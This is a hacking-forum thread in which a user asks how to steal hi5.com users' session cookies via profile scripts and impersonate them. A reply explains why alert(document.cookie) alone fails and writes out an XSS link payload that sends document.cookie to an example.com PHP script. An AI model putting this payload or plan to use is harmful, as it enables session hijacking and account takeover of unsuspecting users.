Jump to content

Want to Start hi5 get cookies proyect!


diego018

Recommended Posts

hi hackers. the social network site, hi5.com allows you to place codes like youtube scripts, etc. in your profile. i know that with a special function. <script>alert(document.cookie)</script>

and if we create a special page in a webserver written in php to store the cookies, we can access as someone user via their cookies.

here is some info i have found:

http://www.pabrantes.net/blog/comments/start/2006-05-01/1 (dont know if it still works)

i don´t know where to start, hope that you can give me some ideas. the only thing that i don´t know how to do, is how to retrieve the cookies, i know how to save them via a php file and a txt file.

Link to comment
Share on other sites

&lt;script&gt;alert(document.cookie)&lt;/script&gt;

only shows you YOUR cookie. It doesn't log a users cookies from another site while visiting your site. It only shows the cookie for the page you are on and if the page you are on has set a cookie. For example, go to any site that uses cookies and type in your address bar the following:

java script:alert(unescape(document.cookie));

(remove the space in "javascript")

It will show you YOUR cookie.

To steal a cookie, the site must be have a flaw to allow a xss attack of some sort, like:

&lt;a href="#" onclick="window.location='http://example.com/somescript.php?cookie='+escape(document.cookie); return false;"&gt;Click here!&lt;/a&gt;

And this only works if you can insert this on a foreign site other than your own, and chances are, won't work if the site knows what they are doing. They should remove any scripting in a post or comment field. The method you describe

&lt;script&gt;alert(document.cookie)&lt;/script&gt;

is not going to work just by having them visit your page.

Look at the link you posted about as they describe more in detail what is going on. Also, that post is from like 2006, so if they are still vulnerable to that sort of attack, I can't imagine they would still be afloat with such xss attacks made so easy on their system.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...